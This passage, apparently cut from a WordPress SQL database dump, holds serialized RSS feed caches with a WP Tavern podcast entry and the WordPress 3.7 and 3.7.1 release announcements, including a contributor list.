WPShout\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10488\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:121:\"http://feedproxy.google.com/~r/WordpressTavern/~3/BrQjYeCM2K0/wpweekly-episode-125-alex-denning-and-the-future-of-wpshout\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3402:\"<p><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/08/WordPressWeekly_albumart2.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/08/WordPressWeekly_albumart2.jpg?resize=150%2C150\" alt=\"WordPress Weekly Cover Art\" class=\"alignright size-thumbnail wp-image-8715\" /></a>On this weeks edition of the show, Alex Denning was my special guest along with the new owners of <a href=\"http://wpshout.com\" title=\"http://wpshout.com\">WPShout.com</a>, Fred and David of <a href=\"http://pressupinc.com/\" title=\"http://pressupinc.com/\">PressUp Inc</a>. In the show, Alex and I talk about the last four years of publishing content on WPShout.com, what types of opportunities it&#8217;s opened up for him, and what it took to put together his annual webhosting review posts. Later in the show, I was joined by David and Fred. We talked about their plans for WPShout.com, their WordPress background and if they have any plans to monetize the site. Since Alex is now going to be focusing on school and has sold his website, I want to take this opportunity to thank him personally for spending his time making WPShout a great resource in the WordPress community. </p>\n<p>If you will be attending <a href=\"http://2013.london.wordcamp.org/\" title=\"http://2013.london.wordcamp.org/\">WordCamp London in November</a>, be sure to attend Alex&#8217;s session or at least say hi to him. It&#8217;s his first WordCamp and <a href=\"http://2013.london.wordcamp.org/speakers/\" title=\"http://2013.london.wordcamp.org/speakers/\">he&#8217;s speaking!</a><span id=\"more-10488\"></span></p>\n<h2>Stories Discussed:</h2>\n<p><a href=\"http://wordpress.org/news/2013/10/basie/\" title=\"http://wordpress.org/news/2013/10/basie/\">WordPress 3.7 Released</a><br />\n<a href=\"http://make.wordpress.org/core/2013/10/25/the-definitive-guide-to-disabling-auto-updates-in-wordpress-3-7/\" title=\"http://make.wordpress.org/core/2013/10/25/the-definitive-guide-to-disabling-auto-updates-in-wordpress-3-7/\">Definitive Guide For Disabling Updates</a><br />\n<a href=\"http://wpshout.com/menace-theme-creep/\" title=\"http://wpshout.com/menace-theme-creep/\">The Menace Of Theme Creep</a><br />\n<a href=\"http://wpshout.com/how-to-find-live-examples-of-just-about-any-wordpress-theme/\" title=\"http://wpshout.com/how-to-find-live-examples-of-just-about-any-wordpress-theme/\">How to find live examples of just about any WordPress theme</a></p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Friday, November 1st 3 P.M. Eastern &#8211; Our special guest for next week&#8217;s episode will be Cory Miller of iThemes.com to talk about his experience of leading one of the most successful commercial WordPress theme businesses on the web.</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href=\"http://www.wptavern.com/feed/podcast\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #125:</strong><br />\n</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/BrQjYeCM2K0\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 26 Oct 2013 01:10:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:9:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sun, 03 Nov 2013 08:53:22 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:14:\"content-length\";s:6:\"150205\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Sun, 03 Nov 2013 08:30:17 GMT\";s:4:\"x-nc\";s:11:\"HIT lax 249\";s:13:\"accept-ranges\";s:5:\"bytes\";}s:5:\"build\";s:14:\"20131101083921\";}', 'no');
INSERT INTO `www_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(3227, '_transient_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca', 'a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:51:\"\n	\n	\n	\n	\n	\n	\n		\n		\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"http://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 21:04:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/?v=3.8-alpha\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:42:\"\n		\n		\n		\n		\n		\n				\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"WordPress 3.7.1 Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"http://wordpress.org/news/2013/10/wordpress-3-7-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"http://wordpress.org/news/2013/10/wordpress-3-7-1/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 21:04:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=2745\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:371:\"WordPress 3.7.1 is now available! This maintenance release addresses 11 bugs in WordPress 3.7, including: Images with captions no longer appear broken in the visual editor. Allow some sites running on old or poorly configured servers to continue to check for updates from WordPress.org. Avoid fatal errors with certain plugins that were incorrectly calling some [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1594:\"<p>WordPress 3.7.1 is now available! This maintenance release addresses 11 bugs in WordPress 3.7, including:</p>\n<ul>\n<li>Images with captions no longer appear broken in the visual editor.</li>\n<li>Allow some sites running on old or poorly configured servers to continue to check for updates from WordPress.org.</li>\n<li>Avoid fatal errors with certain plugins that were incorrectly calling some WordPress functions too early.</li>\n<li>Fix hierarchical sorting in get_pages(), exclusions in wp_list_categories(), and in_category() when called with empty values.</li>\n<li>Fix a warning that may occur in certain setups while performing a search, and a few other notices.</li>\n</ul>\n<p>For a full list of changes, consult the <a href=\"http://core.trac.wordpress.org/query?milestone=3.7.1\">list of tickets</a> and <a href=\"http://core.trac.wordpress.org/log/branches/3.7?stop_rev=25914&amp;rev=25986\">the changelog</a>.</p>\n<p>If you are one of the <a href=\"http://wordpress.org/download/counter/\">nearly two million</a> already running WordPress 3.7, we will start rolling out the all-new <a href=\"http://wordpress.org/news/2013/10/basie/\">automatic background updates</a> for WordPress 3.7.1 in the next few hours. For sites <a href=\"http://wordpress.org/plugins/background-update-tester/\">that support them</a>, of course.</p>\n<p><a href=\"http://wordpress.org/download/\">Download WordPress 3.7.1</a> or venture over to <strong>Dashboard → Updates</strong> and simply click &#8220;Update Now.&#8221;</p>\n<p><em>Just a few fixes<br />\nYour new update attitude:<br />\nZero clicks given</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"http://wordpress.org/news/2013/10/wordpress-3-7-1/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:42:\"\n		\n		\n		\n		\n		\n				\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"WordPress 3.7 “Basie”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://wordpress.org/news/2013/10/basie/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"http://wordpress.org/news/2013/10/basie/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 24 Oct 2013 22:35:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=2736\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:357:\"Version 3.7 of WordPress, named &#8220;Basie&#8221; in honor of Count Basie, is available for download or update in your WordPress dashboard. This release features some of the most important architectural updates we&#8217;ve made to date. Here are the big ones: Updates while you sleep: With WordPress 3.7, you don&#8217;t have to lift a finger to [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:17229:\"<p>Version 3.7 of WordPress, named &#8220;Basie&#8221; in honor of <a href=\"http://en.wikipedia.org/wiki/Count_basie\">Count Basie</a>, is available <a href=\"http://wordpress.org/download/\">for download</a> or update in your WordPress dashboard. This release features some of the most important architectural updates we&#8217;ve made to date. Here are the big ones:</p>\n<ul>\n<li><strong>Updates while you sleep</strong>: With WordPress 3.7, you don&#8217;t have to lift a finger to apply maintenance and security updates. Most sites are now able to automatically apply these updates in the background. The update process also has been made even more reliable and secure, with dozens of new checks and safeguards.</li>\n<li><strong>Stronger password recommendations</strong>: Your password is your site&#8217;s first line of defense. It&#8217;s best to create passwords that are complex, long, and unique. To that end, our password meter has been updated in WordPress 3.7 to recognize common mistakes that can weaken your password: dates, names, keyboard patterns (123456789), and even pop culture references.</li>\n<li><strong>Better global support</strong>: Localized versions of WordPress will receive faster and more complete translations. WordPress 3.7 adds support for automatically installing the right language files and keeping them up to date, a boon for the many millions who use WordPress in a language other than English.</li>\n</ul>\n<p>For developers there are lots of options around how to control the new updates feature, including allowing it to handle major upgrades as well as minor ones, more sophisticated date query support, and multisite improvements. As always, if you&#8217;re hungry for more <a href=\"http://codex.wordpress.org/Version_3.7\">dive into the Codex</a> or browse the <a href=\"http://core.trac.wordpress.org/query?status=closed&amp;group=resolution&amp;milestone=3.7\">over 400 closed tickets on Trac</a>.</p>\n<h3>A New Wave</h3>\n<p>This release was led by Andrew Nacin, backed up by Dion Hulse and Jon Cave. This is our first release using the new plugin-first development process, with a much shorter timeframe than in the past. (3.6 was released in August.) The 3.8 release, due in December, will continue this plugin-led development cycle that gives much more autonomy to plugin leads and allows us to decouple feature development from a release. You can follow this grand experiment, and what we&#8217;re learning from it, <a href=\"http://make.wordpress.org/core/\">on the make/core blog</a>. There are 211 contributors with props in this release:</p>\n<p><a href=\"http://profiles.wordpress.org/technosailor\">Aaron Brazell</a>, <a href=\"http://profiles.wordpress.org/aaroncampbell\">Aaron D. Campbell</a>, <a href=\"http://profiles.wordpress.org/aaronholbrook\">Aaron Holbrook</a>, <a href=\"http://profiles.wordpress.org/jorbin\">Aaron Jorbin</a>, <a href=\"http://profiles.wordpress.org/adamsilverstein\">adamsilverstein</a>, <a href=\"http://profiles.wordpress.org/ahoereth\">Alexander Hoereth</a>, <a href=\"http://profiles.wordpress.org/viper007bond\">Alex Mills (Viper007Bond)</a>, <a href=\"http://profiles.wordpress.org/sabreuse\">Amy Hendrix (sabreuse)</a>, <a href=\"http://profiles.wordpress.org/andg\">andg</a>, <a href=\"http://profiles.wordpress.org/nacin\">Andrew Nacin</a>, <a href=\"http://profiles.wordpress.org/norcross\">Andrew Norcross</a>, <a href=\"http://profiles.wordpress.org/azaozz\">Andrew Ozz</a>, <a href=\"http://profiles.wordpress.org/andrewspittle\">Andrew Spittle</a>, <a href=\"http://profiles.wordpress.org/askapache\">askapache</a>, <a href=\"http://profiles.wordpress.org/atimmer\">atimmer</a>, <a href=\"http://profiles.wordpress.org/barry\">Barry</a>, <a href=\"http://profiles.wordpress.org/beaulebens\">Beau Lebens</a>, <a href=\"http://profiles.wordpress.org/benmoody\">ben.moody</a>, <a href=\"http://profiles.wordpress.org/bhengh\">Ben Miller</a>, <a href=\"http://profiles.wordpress.org/neoxx\">Bernhard Riedl</a>, <a href=\"http://profiles.wordpress.org/bftrick\">BFTrick</a>, <a href=\"http://profiles.wordpress.org/bananastalktome\">Billy (bananastalktome)</a>, <a href=\"http://profiles.wordpress.org/bmb\">bmb</a>, <a href=\"http://profiles.wordpress.org/kraftbj\">Brandon Kraft</a>, <a href=\"http://profiles.wordpress.org/brianhogg\">brianhogg</a>, <a href=\"http://profiles.wordpress.org/rzen\">Brian Richards</a>, <a href=\"http://profiles.wordpress.org/bpetty\">Bryan Petty</a>, <a href=\"http://profiles.wordpress.org/carldanley\">Carl Danley</a>, <a href=\"http://profiles.wordpress.org/charlesclarkson\">CharlesClarkson</a>, <a href=\"http://profiles.wordpress.org/chipbennett\">Chip Bennett</a>, <a href=\"http://profiles.wordpress.org/chouby\">Chouby</a>, <a href=\"http://profiles.wordpress.org/c3mdigital\">Chris Olbekson</a>, <a href=\"http://profiles.wordpress.org/chrisrudzki\">Chris Rudzki</a>, <a href=\"http://profiles.wordpress.org/aeg0125\">coderaaron</a>, <a href=\"http://profiles.wordpress.org/coenjacobs\">Coen Jacobs</a>, <a href=\"http://profiles.wordpress.org/crrobi01\">Colin Robinson</a>, <a href=\"http://profiles.wordpress.org/andreasnrb\">cyonite</a>, <a href=\"http://profiles.wordpress.org/daankortenbach\">Daan Kortenbach</a>, <a href=\"http://profiles.wordpress.org/danielbachhuber\">Daniel Bachhuber</a>, <a href=\"http://profiles.wordpress.org/convissor\">Daniel Convissor</a>, <a href=\"http://profiles.wordpress.org/dartiss\">dartiss</a>, <a href=\"http://profiles.wordpress.org/koop\">Daryl Koopersmith</a>, <a href=\"http://profiles.wordpress.org/csixty4\">Dave Ross</a>, <a href=\"http://profiles.wordpress.org/davidjlaietta\">David Laietta</a>, <a href=\"http://profiles.wordpress.org/dd32\">Dion Hulse</a>, <a href=\"http://profiles.wordpress.org/dllh\">dllh</a>, <a href=\"http://profiles.wordpress.org/ocean90\">Dominik Schilling (ocean90)</a>, <a href=\"http://profiles.wordpress.org/dpash\">dpash</a>, <a href=\"http://profiles.wordpress.org/drewapicture\">Drew Jaynes</a>, <a href=\"http://profiles.wordpress.org/drprotocols\">DrProtocols</a>, <a href=\"http://profiles.wordpress.org/dustyf\">Dustin Filippini</a>, <a href=\"http://profiles.wordpress.org/dzver\">dzver</a>, <a href=\"http://profiles.wordpress.org/cais\">Edward Caissie</a>, <a href=\"http://profiles.wordpress.org/enej\">enej</a>, <a href=\"http://profiles.wordpress.org/ericlewis\">Eric Andrew Lewis</a>, <a href=\"http://profiles.wordpress.org/ericmann\">Eric Mann</a>, <a href=\"http://profiles.wordpress.org/evansolomon\">Evan Solomon</a>, <a href=\"http://profiles.wordpress.org/faishal\">faishal</a>, <a href=\"http://profiles.wordpress.org/faison\">Faison</a>, <a href=\"http://profiles.wordpress.org/foofy\">Foofy</a>, <a href=\"http://profiles.wordpress.org/fjarrett\">Frankie Jarrett</a>, <a href=\"http://profiles.wordpress.org/frank-klein\">Frank Klein</a>, <a href=\"http://profiles.wordpress.org/garyc40\">Gary Cao</a>, <a href=\"http://profiles.wordpress.org/pento\">Gary Pendergast</a>, <a href=\"http://profiles.wordpress.org/gayadesign\">Gaya Kessler</a>, <a href=\"http://profiles.wordpress.org/georgestephanis\">George Stephanis</a>, <a href=\"http://profiles.wordpress.org/gizburdt\">Gizburdt</a>, <a href=\"http://profiles.wordpress.org/goldenapples\">goldenapples</a>, <a href=\"http://profiles.wordpress.org/gradyetc\">gradyetc</a>, <a href=\"http://profiles.wordpress.org/gcorne\">Gregory Cornelius</a>, <a href=\"http://profiles.wordpress.org/webord\">Gustavo Bordoni</a>, <a href=\"http://profiles.wordpress.org/hakre\">hakre</a>, <a href=\"http://profiles.wordpress.org/helen\">Helen Hou-Sandi</a>, <a href=\"http://profiles.wordpress.org/iandunn\">Ian Dunn</a>, <a href=\"http://profiles.wordpress.org/ipstenu\">Ipstenu (Mika Epstein)</a>, <a href=\"http://profiles.wordpress.org/creativeinfusion\">itinerant</a>, <a href=\"http://profiles.wordpress.org/jdgrimes\">J.D. Grimes</a>, <a href=\"http://profiles.wordpress.org/jakubtyrcha\">jakub.tyrcha</a>, <a href=\"http://profiles.wordpress.org/jamescollins\">James Collins</a>, <a href=\"http://profiles.wordpress.org/jenmylo\">Jen Mylo</a>, <a href=\"http://profiles.wordpress.org/buffler\">Jeremy Buller</a>, <a href=\"http://profiles.wordpress.org/jeremyfelt\">Jeremy Felt</a>, <a href=\"http://profiles.wordpress.org/jayjdk\">Jesper Johansen (jayjdk)</a>, <a href=\"http://profiles.wordpress.org/joehoyle\">Joe Hoyle</a>, <a href=\"http://profiles.wordpress.org/jkudish\">Joey Kudish</a>, <a href=\"http://profiles.wordpress.org/johnnyb\">John Beales</a>, <a href=\"http://profiles.wordpress.org/johnbillion\">John Blackbourn (johnbillion)</a>, <a href=\"http://profiles.wordpress.org/johnafish\">John Fish</a>, <a href=\"http://profiles.wordpress.org/johnjamesjacoby\">John James Jacoby</a>, <a href=\"http://profiles.wordpress.org/johnpbloch\">John P. Bloch</a>, <a href=\"http://profiles.wordpress.org/jond3r\">Jonas Bolinder (jond3r)</a>, <a href=\"http://profiles.wordpress.org/jchristopher\">Jonathan Christopher</a>, <a href=\"http://profiles.wordpress.org/desrosj\">Jonathan Desrosiers</a>, <a href=\"http://profiles.wordpress.org/duck_\">Jon Cave</a>, <a href=\"http://profiles.wordpress.org/jonlynch\">Jon Lynch</a>, <a href=\"http://profiles.wordpress.org/joostdevalk\">Joost de Valk</a>, <a href=\"http://profiles.wordpress.org/josephscott\">Joseph Scott</a>, <a href=\"http://profiles.wordpress.org/betzster\">Josh Betz</a>, <a href=\"http://profiles.wordpress.org/devesine\">Justin de Vesine</a>, <a href=\"http://profiles.wordpress.org/justinsainton\">Justin Sainton</a>, <a href=\"http://profiles.wordpress.org/kadamwhite\">K.Adam White</a>, <a href=\"http://profiles.wordpress.org/trepmal\">Kailey (trepmal)</a>, <a href=\"http://profiles.wordpress.org/ketwaroo\">Ketwaroo</a>, <a href=\"http://profiles.wordpress.org/kevinb\">kevinB</a>, <a href=\"http://profiles.wordpress.org/kpdesign\">Kim Parsell</a>, <a href=\"http://profiles.wordpress.org/kitchin\">kitchin</a>, <a href=\"http://profiles.wordpress.org/kovshenin\">Konstantin Kovshenin</a>, <a href=\"http://profiles.wordpress.org/obenland\">Konstantin Obenland</a>, <a href=\"http://profiles.wordpress.org/koopersmith\">koopersmith</a>, <a href=\"http://profiles.wordpress.org/kurtpayne\">Kurt Payne</a>, <a href=\"http://profiles.wordpress.org/lancewillett\">Lance Willett</a>, <a href=\"http://profiles.wordpress.org/leewillis77\">Lee Willis (leewillis77)</a>, <a href=\"http://profiles.wordpress.org/lessbloat\">lessbloat</a>, <a href=\"http://profiles.wordpress.org/layotte\">Lew Ayotte</a>, <a href=\"http://profiles.wordpress.org/lgedeon\">Luke Gedeon</a>, <a href=\"http://profiles.wordpress.org/iworks\">Marcin Pietrzak</a>, <a href=\"http://profiles.wordpress.org/cimmo\">Marco Cimmino</a>, <a href=\"http://profiles.wordpress.org/marco_teethgrinder\">Marco Galasso</a>, <a href=\"http://profiles.wordpress.org/markjaquith\">Mark Jaquith</a>, <a href=\"http://profiles.wordpress.org/markmcwilliams\">Mark McWilliams</a>, <a href=\"http://profiles.wordpress.org/markoheijnen\">Marko Heijnen</a>, <a href=\"http://profiles.wordpress.org/melchoyce\">Mel Choyce</a>, <a href=\"http://profiles.wordpress.org/tw2113\">Michael Beckwith</a>, <a href=\"http://profiles.wordpress.org/mikehansenme\">Mike Hansen</a>, <a href=\"http://profiles.wordpress.org/mikeschinkel\">Mike Schinkel</a>, <a href=\"http://profiles.wordpress.org/dh-shredder\">Mike Schroder</a>, <a href=\"http://profiles.wordpress.org/dimadin\">Milan Dinic</a>, <a href=\"http://profiles.wordpress.org/mitchoyoshitaka\">mitcho (Michael Yoshitaka Erlewine)</a>, <a href=\"http://profiles.wordpress.org/usermrpapa\">Mr Papa</a>, <a href=\"http://profiles.wordpress.org/Nao\">Naoko Takano</a>, <a href=\"http://profiles.wordpress.org/naomicbush\">Naomi</a>, <a href=\"http://profiles.wordpress.org/alex-ye\">Nashwan Doaqan</a>, <a href=\"http://profiles.wordpress.org/natejacobs\">NateJacobs</a>, <a href=\"http://profiles.wordpress.org/nathanrice\">nathanrice</a>, <a href=\"http://profiles.wordpress.org/niallkennedy\">Niall Kennedy</a>, <a href=\"http://profiles.wordpress.org/nickdaugherty\">Nick Daugherty</a>, <a href=\"http://profiles.wordpress.org/celloexpressions\">Nick Halsey</a>, <a href=\"http://profiles.wordpress.org/nickmomrik\">Nick Momrik</a>, <a href=\"http://profiles.wordpress.org/nikv\">Nikhil Vimal (NikV)</a>, <a href=\"http://profiles.wordpress.org/nbachiyski\">Nikolay Bachiyski</a>, <a href=\"http://profiles.wordpress.org/noahsilverstein\">noahsilverstein</a>, <a href=\"http://profiles.wordpress.org/nofearinc\">nofearinc</a>, <a href=\"http://profiles.wordpress.org/nukaga\">nukaga</a>, <a href=\"http://profiles.wordpress.org/nullvariable\">nullvariable</a>, <a href=\"http://profiles.wordpress.org/butuzov\">Oleg Butuzov</a>, <a href=\"http://profiles.wordpress.org/paolal\">Paolo Belcastro</a>, <a href=\"http://profiles.wordpress.org/xparham\">Parham</a>, <a href=\"http://profiles.wordpress.org/pbiron\">Paul Biron</a>, <a href=\"http://profiles.wordpress.org/pauldewouters\">Paul de Wouters</a>, <a href=\"http://profiles.wordpress.org/pavelevap\">pavelevap</a>, <a href=\"http://profiles.wordpress.org/peterjaap\">peterjaap</a>, <a href=\"http://profiles.wordpress.org/westi\">Peter Westwood</a>, <a href=\"http://profiles.wordpress.org/philiparthurmoore\">Philip Arthur Moore</a>, <a href=\"http://profiles.wordpress.org/mordauk\">Pippin Williamson</a>, <a href=\"http://profiles.wordpress.org/plocha\">plocha</a>, <a href=\"http://profiles.wordpress.org/pollett\">Pollett</a>, <a href=\"http://profiles.wordpress.org/ptahdunbar\">Ptah Dunbar</a>, <a href=\"http://profiles.wordpress.org/ramiy\">Rami Yushuvaev</a>, <a href=\"http://profiles.wordpress.org/rasheed\">Rasheed Bydousi</a>, <a href=\"http://profiles.wordpress.org/raybernard\">RayBernard</a>, <a 